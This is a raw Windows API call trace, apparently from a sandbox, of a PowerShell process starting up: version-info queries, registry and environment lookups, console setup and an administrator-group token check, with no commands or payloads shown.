	[0942.068] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0942.068] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0942.068] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x818
	[0942.068] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x5b8
	[0942.068] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x494
	[0942.068] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1ec
	[0942.069] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x440
	[0942.069] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x7e8
	[0942.069] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x730
	[0942.069] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x2c8
	[0942.069] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x31c
	[0942.148] WerSetFlags () returned 0x0
	[0942.155] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0942.156] CoTaskMemFree (pv=0x0) 
	[0942.156] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1edb68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1edb60 | out: pulNumLanguages=0x1edb68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1edb60) returned 1
	[0942.156] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1edb68, pwszLanguagesBuffer=0x2eaf1d8, pcchLanguagesBuffer=0x1edb60 | out: pulNumLanguages=0x1edb68, pwszLanguagesBuffer=0x2eaf1d8, pcchLanguagesBuffer=0x1edb60) returned 1
	[0942.161] CoTaskMemAlloc (cb=0x24) returned 0x38abd0
	[0942.161] GetUserDefaultLocaleName (in: lpLocaleName=0x38abd0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0942.162] CoTaskMemFree (pv=0x38abd0) 
	[0942.422] CoTaskMemAlloc (cb=0x104) returned 0x2dcdc0
	[0942.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dcdc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.422] CoTaskMemFree (pv=0x2dcdc0) 
	[0942.424] CoTaskMemAlloc (cb=0x104) returned 0x2dcdc0
	[0942.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dcdc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.424] CoTaskMemFree (pv=0x2dcdc0) 
	[0942.424] CoTaskMemAlloc (cb=0x104) returned 0x2dcdc0
	[0942.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dcdc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.424] CoTaskMemFree (pv=0x2dcdc0) 
	[0942.427] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1eda50 | out: lpdwHandle=0x1eda50) returned 0x94c
	[0942.428] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2eb2a68 | out: lpData=0x2eb2a68) returned 1
	[0942.429] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed9c8, puLen=0x1ed9c0 | out: lplpBuffer=0x1ed9c8*=0x2eb2b04, puLen=0x1ed9c0) returned 1
	[0942.429] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ed938, puLen=0x1ed930 | out: lplpBuffer=0x1ed938*=0x2eb2be0, puLen=0x1ed930) returned 1
	[0942.429] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0942.429] CoTaskMemAlloc (cb=0x2e) returned 0x389ee0
	[0942.429] lstrcpyW (in: lpString1=0x389ee0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0942.429] CoTaskMemFree (pv=0x389ee0) 
	[0942.429] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ed938, puLen=0x1ed930 | out: lplpBuffer=0x1ed938*=0x2eb2c34, puLen=0x1ed930) returned 1
	[0942.429] lstrlenW (lpString="System.Management.Automation") returned 28
	[0942.429] CoTaskMemAlloc (cb=0x3c) returned 0x333110
	[0942.429] lstrcpyW (in: lpString1=0x333110, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0942.430] CoTaskMemFree (pv=0x333110) 
	[0942.430] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ed938, puLen=0x1ed930 | out: lplpBuffer=0x1ed938*=0x2eb2c90, puLen=0x1ed930) returned 1
	[0942.430] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0942.430] CoTaskMemAlloc (cb=0x20) returned 0x38ac30
	[0942.430] lstrcpyW (in: lpString1=0x38ac30, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0942.430] CoTaskMemFree (pv=0x38ac30) 
	[0942.430] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ed938, puLen=0x1ed930 | out: lplpBuffer=0x1ed938*=0x2eb2cd0, puLen=0x1ed930) returned 1
	[0942.430] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0942.430] CoTaskMemAlloc (cb=0x44) returned 0x333110
	[0942.430] lstrcpyW (in: lpString1=0x333110, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0942.430] CoTaskMemFree (pv=0x333110) 
	[0942.430] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ed938, puLen=0x1ed930 | out: lplpBuffer=0x1ed938*=0x2eb2d38, puLen=0x1ed930) returned 1
	[0942.430] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0942.430] CoTaskMemAlloc (cb=0x76) returned 0x31f260
	[0942.430] lstrcpyW (in: lpString1=0x31f260, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0942.430] CoTaskMemFree (pv=0x31f260) 
	[0942.430] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ed938, puLen=0x1ed930 | out: lplpBuffer=0x1ed938*=0x2eb2dd4, puLen=0x1ed930) returned 1
	[0942.430] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0942.430] CoTaskMemAlloc (cb=0x44) returned 0x333110
	[0942.430] lstrcpyW (in: lpString1=0x333110, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0942.430] CoTaskMemFree (pv=0x333110) 
	[0942.430] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ed938, puLen=0x1ed930 | out: lplpBuffer=0x1ed938*=0x2eb2e38, puLen=0x1ed930) returned 1
	[0942.430] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0942.430] CoTaskMemAlloc (cb=0x58) returned 0x33d550
	[0942.430] lstrcpyW (in: lpString1=0x33d550, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0942.430] CoTaskMemFree (pv=0x33d550) 
	[0942.430] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ed938, puLen=0x1ed930 | out: lplpBuffer=0x1ed938*=0x2eb2eb4, puLen=0x1ed930) returned 1
	[0942.430] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0942.430] CoTaskMemAlloc (cb=0x20) returned 0x38ac30
	[0942.431] lstrcpyW (in: lpString1=0x38ac30, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0942.431] CoTaskMemFree (pv=0x38ac30) 
	[0942.431] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ed938, puLen=0x1ed930 | out: lplpBuffer=0x1ed938*=0x2eb2b5c, puLen=0x1ed930) returned 1
	[0942.431] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0942.431] CoTaskMemAlloc (cb=0x66) returned 0x37d730
	[0942.431] lstrcpyW (in: lpString1=0x37d730, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0942.431] CoTaskMemFree (pv=0x37d730) 
	[0942.431] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ed938, puLen=0x1ed930 | out: lplpBuffer=0x1ed938*=0x0, puLen=0x1ed930) returned 0
	[0942.431] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ed938, puLen=0x1ed930 | out: lplpBuffer=0x1ed938*=0x0, puLen=0x1ed930) returned 0
	[0942.431] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ed938, puLen=0x1ed930 | out: lplpBuffer=0x1ed938*=0x0, puLen=0x1ed930) returned 0
	[0942.431] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed908, puLen=0x1ed900 | out: lplpBuffer=0x1ed908*=0x2eb2b04, puLen=0x1ed900) returned 1
	[0942.431] CoTaskMemAlloc (cb=0x204) returned 0x321dc0
	[0942.431] VerLanguageNameW (in: wLang=0x0, szLang=0x321dc0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0942.431] CoTaskMemFree (pv=0x321dc0) 
	[0942.431] VerQueryValueW (in: pBlock=0x2eb2a68, lpSubBlock="\\", lplpBuffer=0x1ed958, puLen=0x1ed950 | out: lplpBuffer=0x1ed958*=0x2eb2a90, puLen=0x1ed950) returned 1
	[0942.432] CoTaskMemAlloc (cb=0x104) returned 0x2dcdc0
	[0942.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dcdc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.432] CoTaskMemFree (pv=0x2dcdc0) 
	[0942.433] CoTaskMemAlloc (cb=0x104) returned 0x2dcdc0
	[0942.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dcdc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.433] CoTaskMemFree (pv=0x2dcdc0) 
	[0942.437] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed828 | out: phkResult=0x1ed828*=0x2e8) returned 0x0
	[0942.438] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed818 | out: phkResult=0x1ed818*=0x2ec) returned 0x0
	[0942.438] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed8a8 | out: phkResult=0x1ed8a8*=0x2f0) returned 0x0
	[0942.439] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed7ec, lpData=0x0, lpcbData=0x1ed7e8*=0x0 | out: lpType=0x1ed7ec*=0x1, lpData=0x0, lpcbData=0x1ed7e8*=0x56) returned 0x0
	[0942.439] CoTaskMemAlloc (cb=0x5a) returned 0x37d6c0
	[0942.439] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed7bc, lpData=0x37d6c0, lpcbData=0x1ed7b8*=0x56 | out: lpType=0x1ed7bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed7b8*=0x56) returned 0x0
	[0942.439] CoTaskMemFree (pv=0x37d6c0) 
	[0942.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.459] CoTaskMemAlloc (cb=0x104) returned 0x2dcdc0
	[0942.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dcdc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.459] CoTaskMemFree (pv=0x2dcdc0) 
	[0943.866] CoTaskMemAlloc (cb=0x104) returned 0x2dced0
	[0943.866] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dced0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.866] CoTaskMemFree (pv=0x2dced0) 
	[0943.868] CoTaskMemAlloc (cb=0x104) returned 0x2dced0
	[0943.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dced0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.868] CoTaskMemFree (pv=0x2dced0) 
	[0944.528] CoTaskMemAlloc (cb=0x104) returned 0x2dced0
	[0944.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dced0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0944.528] CoTaskMemFree (pv=0x2dced0) 
	[0944.528] CoTaskMemAlloc (cb=0x104) returned 0x2dced0
	[0944.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dced0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0944.529] CoTaskMemFree (pv=0x2dced0) 
	[0944.529] CoTaskMemAlloc (cb=0x104) returned 0x2dced0
	[0944.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dced0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0944.529] CoTaskMemFree (pv=0x2dced0) 
	[0945.312] CoTaskMemAlloc (cb=0x104) returned 0x2dced0
	[0945.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dced0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0945.312] CoTaskMemFree (pv=0x2dced0) 
	[0945.315] CoTaskMemAlloc (cb=0x104) returned 0x2dced0
	[0945.315] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dced0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0945.315] CoTaskMemFree (pv=0x2dced0) 
	[0945.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0945.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.183] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0954.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.183] CoTaskMemFree (pv=0x2dd0f0) 
	[0954.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0954.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0954.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0954.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ed500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0954.199] SetErrorMode (uMode=0x1) returned 0x1
	[0954.199] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ed780 | out: lpFileInformation=0x1ed780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0954.199] SetErrorMode (uMode=0x1) returned 0x1
	[0973.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.932] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0973.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.932] CoTaskMemFree (pv=0x2dd0f0) 
	[0973.935] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0973.935] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.935] CoTaskMemFree (pv=0x2dd0f0) 
	[0973.935] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0973.935] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.935] CoTaskMemFree (pv=0x2dd0f0) 
	[0973.938] CoCreateGuid (in: pguid=0x1edb48 | out: pguid=0x1edb48*(Data1=0x283353cd, Data2=0xd8f0, Data3=0x4ac6, Data4=([0]=0x8d, [1]=0xe0, [2]=0xf1, [3]=0x33, [4]=0x17, [5]=0x5a, [6]=0xc1, [7]=0xdd))) returned 0x0
	[0973.940] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0973.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.940] CoTaskMemFree (pv=0x2dd0f0) 
	[0973.943] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0973.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.943] CoTaskMemFree (pv=0x2dd0f0) 
	[0973.945] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0973.945] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.945] CoTaskMemFree (pv=0x2dd0f0) 
	[0973.960] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0974.218] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ed7f0 | out: lpConsoleScreenBufferInfo=0x1ed7f0) returned 1
	[0974.254] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0974.255] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ed7f0 | out: lpConsoleScreenBufferInfo=0x1ed7f0) returned 1
	[0974.259] GetCurrentProcess () returned 0xffffffffffffffff
	[0974.260] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ed818 | out: TokenHandle=0x1ed818*=0x304) returned 1
	[0974.262] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed738 | out: TokenInformation=0x0, ReturnLength=0x1ed738) returned 0
	[0974.263] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e7280
	[0974.263] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x2e7280, TokenInformationLength=0x4, ReturnLength=0x1ed738 | out: TokenInformation=0x2e7280, ReturnLength=0x1ed738) returned 1
	[0974.264] DuplicateTokenEx (in: hExistingToken=0x304, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1ed898 | out: phNewToken=0x1ed898*=0x300) returned 1
	[0974.264] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed738 | out: TokenInformation=0x0, ReturnLength=0x1ed738) returned 0
	[0974.265] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e72b0
	[0974.265] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x2e72b0, TokenInformationLength=0x4, ReturnLength=0x1ed738 | out: TokenInformation=0x2e72b0, ReturnLength=0x1ed738) returned 1
	[0974.266] CheckTokenMembership (in: TokenHandle=0x300, SidToCheck=0x2f8d810*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1ed8a8 | out: IsMember=0x1ed8a8) returned 1
	[0974.266] CloseHandle (hObject=0x300) returned 1
	[0974.279] CoTaskMemAlloc (cb=0x804) returned 0x1b4e9210
	[0974.279] GetConsoleTitleW (in: lpConsoleTitle=0x1b4e9210, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0974.279] CoTaskMemFree (pv=0x1b4e9210) 
	[0974.303] CoTaskMemAlloc (cb=0x804) returned 0x1b4eaac0
	[0974.303] GetConsoleTitleW (in: lpConsoleTitle=0x1b4eaac0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0974.304] CoTaskMemFree (pv=0x1b4eaac0) 
	[0974.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
